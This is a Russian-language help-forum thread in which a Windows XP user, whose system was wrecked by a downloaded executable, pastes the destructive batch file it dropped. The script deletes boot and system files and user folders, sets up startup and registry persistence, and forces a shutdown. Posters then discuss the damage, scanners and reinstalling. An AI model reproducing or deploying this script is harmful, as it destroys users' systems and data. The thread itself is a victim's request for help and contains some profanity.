Всем привет!
Зародилась проблема, по средине для открыл ***.exe после открытия файл уничтожился, сразу понял что вирус я начал искать файлы и нашел 2 батника в первом просто текст а втором вот

cd\
ATTRIB -R -H -S c:\*.*
del /f /s /q NTLDR
cd %windir%
cd system32
start c:\hello.bat \wait
rmdir /s /q "C:\Documents and Settings\"
del /f /s /q hal.dll
cd c:\windows/system32
del HAL.DLL /f /s /q
cd c:\windows/servicepackfiles/i386
del hal.dll /f /s /q
cd c:\windows/$NtServicePackUninstall$
del hal.dll /f /s /q
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
COPY %0 *path*
COPY %0 "C:/Documents and Settings\All Users\Start Menu\Programs\Startup
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v owned /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
ipconfig /release
shutdown -s -t 120 -c "You Have 180 Seconds To save Your HD Information"



полетела винда пропал файл ntldr я его восстановил, удалились еще все файлы пользователей их я тоже восстановил через рстудия.

Сейчас у меня осталась одна проблема, удалились с компьютера все пользователи кроме моего.
Если создать новый пользователь то у него все не работает например отображение скрытых файлов, нельзя поменять заставку, фон, шрифт и так далее но у моего пользователя все работает отлично!

Есть еще файл NTUSER.DAT знаете наверно в документах лежит, если на него тыкнуть то сразу вылетает експлотер из-за чего не знаю =(

Как мне создать нормального пользователя с нормальными привилегиями, я так понял поменялись в реестре настройки которые идут по умолчанию из этого следует ...

Можно ли это както устранить ? Помогите...

Переустанови винду или антивирем весь хард проверь...

винду переустанавливать не собираюсь, так как больше 100gb сохранять придется.
мне кажется антивирус все не исправит, пытался еще программой для восстановления реестра все равно не катит.

Винда ХР??

да винда XP SP3

Проще винду переустановить... есть ещё вариант, но винда может криво работать...

давай )))

Винду поверх своей винды установить :D И все данные остануться на своих местах...

так и знал что это напишешь )))

del /f /s /q hal.dll
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE

Как после такого вообще что-то работает. Значит не сработал вирус, если клава в рабочем состоянии.
П.С. А кто знает, за что отвечает hal.dll ?

ТС, скачай с сайда ДрВеб сканер бесплатный, CureIt называется. Просканься. Хотя реестр придется вручную фиксить, если не хочешь переустонавливать винду.

а и ещё
shutdown -s -t 120 -c "You Have 180 Seconds To save Your HD Information"
не сработал )))

охуеть, да ты хакер блять!

а и ещё у меня в c:\windows лежит Vista, а в c:\windows.0 XP

ещё лучше )))

cd c:\windows/system32
del HAL.DLL /f /s /q
cd c:\windows/servicepackfiles/i386
del hal.dll /f /s /q
cd c:\windows/$NtServicePackUninstall$
del hal.dll /f /s /q

у кого ещё какие идеи есть, а то я уже диск готовлю и резервку делаю )))?
сомое главное
пароль от мыла, ключь от вебмани, логин от paypal, icq что ещё ?

а че у тебя в c:\Users лежит а

у меня С:\Users и C:\Documents and Settings одно и то же, а что такое ?

а че ты

Чего ?))))

что нет решения чтоли этой проблемы ????
а нельзя скопировать строчки моего пользователя и перенести их на другой пользовател исправив пару строчек ... ?

какие на*** строчки, ты чего путаешь бес

да у тебя дар просто какой то плохие идеи отклонять )))

Подскажи что сделать можно ))

скань комп в безопаске.... авз\др.веб тебе помогут думаю.. если не помогут то лезь в реестр)

скань комп в безопаске.... авз\др.веб тебе помогут думаю.. если не помогут то лезь в реестр)


ща сканить начну, а что в реестре делать ?

я почитал tweaks попробовал пару штучек и запарол пару приложений но я ещё могу их использовать, а у других пользователей нельзя в реестр ничего добавлять с *.reg у меня мало опыта с реестром а всё остально норм пока )))

хуле ты такой модный, ставь линукс и не еби форумчанам мозги!

Оло
cd c:\windows/system32
cd c:\windows/servicepackfiles/i386
cd c:\windows/$NtServicePackUninstall$

Хакеры %SystemRoot% Не юзают ? :D

хуле ты такой модный, ставь линукс и не еби форумчанам мозги!

ну не надо матом ) глаза мазолит )))))
Linux всякие Unix мне пока не нужны на днях тока закончил изучение Blitz3D такто мне надо не тока OpenGL но и DirectX.

Ну короче не крути яйца, для увеличения своего опыта хочу узнать как справиться с такой ситуацией :rolleyes:


Оло
Хакеры %SystemRoot% Не юзают ? :D

эх блин искал прогу наверно как ты говоришь "хакер" очень поторопился и людей начал смешить )))
зачем хакеру писать %SystemRoot% когда C:\Windows можно скопировать в адресной строке и тем более там меньше символов, а это значит быстрее напечатаешь ))) :D :D :D

Помниш название вируса ? Попробуй поищи его в базах каспера или чего то еще. Мб там есть точное описание того что делает вирус ( тупой совет ). А вообще.... перестановка рулит. Так как винду ты уже врядле исправиш. Фиг его знает че там еще вирус натворил.

зачем хакеру писать %SystemRoot% когда C:\Windows можно скопировать в адресной строке и тем более там меньше символов, а это значит быстрее напечатаешь ))) :D :D :D
А ты не думал о таком что системная дериктория может быть не тока на C Но и на D и т.д ! Открытие До ? :D

Помниш название вируса ? Попробуй поищи его в базах каспера или чего то еще. Мб там есть точное описание того что делает вирус ( тупой совет ). А вообще.... перестановка рулит. Так как винду ты уже врядле исправиш. Фиг его знает че там еще вирус натворил.

ага даже так!

ну смотри файл *.exe был скачен и просканирован 2 раза авастом это первое

я так думаю что exe был создан Winrarом так как там есть такая функция распокавать и открыть файл

формат .bat и исходный код антивирусом не проверяеться XD))


А ты не думал о таком что системная дериктория может быть не тока на C Но и на D и т.д ! Открытие До ? :D


вообщето я шутил :D :D :D :D :D

ну смотри файл *.exe был скачен и просканирован 2 раза авастом это первое
в этом и есть ваша проблема, господин. дело в том, что надо это делать 4 раза. 2 раза утром и 2 раза вечером. и можно еще 1 раз ночью.

вообщето я шутил :D :D :D :D :D
Та я тоже изначально шутил ;)

З.Ы Сноси винду... и файлы можно не потерять (тоесть установить по верх) Самый норм а сидеть с какойто поломаной виндой дак это ппц... А если этот вирь еще БД приташил за собой ? и будеш так сидеть пока вася не законектится и не потерёт у тя всё... От тогда ты точно всё потеряеш :eek:

в этом и есть ваша проблема, господин. дело в том, что надо это делать 4 раза. 2 раза утром и 2 раза вечером. и можно еще 1 раз ночью.
а прикольно может мне ещё его открыть в блокноте запомнить, далее пойти к другу напечать его в блокноте и сохранить как *.exe и показать ему типо пусть тоже посканирует ?

Та я тоже изначально шутил ;)

З.Ы Сноси винду... и файлы можно не потерять (тоесть установить по верх) Самый норм а сидеть с какойто поломаной виндой дак это ппц... А если этот вирь еще БД приташил за собой ? и будеш так сидеть пока вася не законектится и не потерёт у тя всё... От тогда ты точно всё потеряеш :eek:

ну да наверно так и поступлю =(
опять лицензию искать драйвера )))

del /f /s /q hal.dll
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
Как после такого вообще что-то работает.
А что по твоему не должно работать? RUNDLL это не команда, это не файл (тем более в папке c:\windows/$NtServicePackUninstall$)
такчо я незнаю что по твоему там неработать должно...

Всё ребятки чики пуки всё переустановил ))))

Тема закрыта :D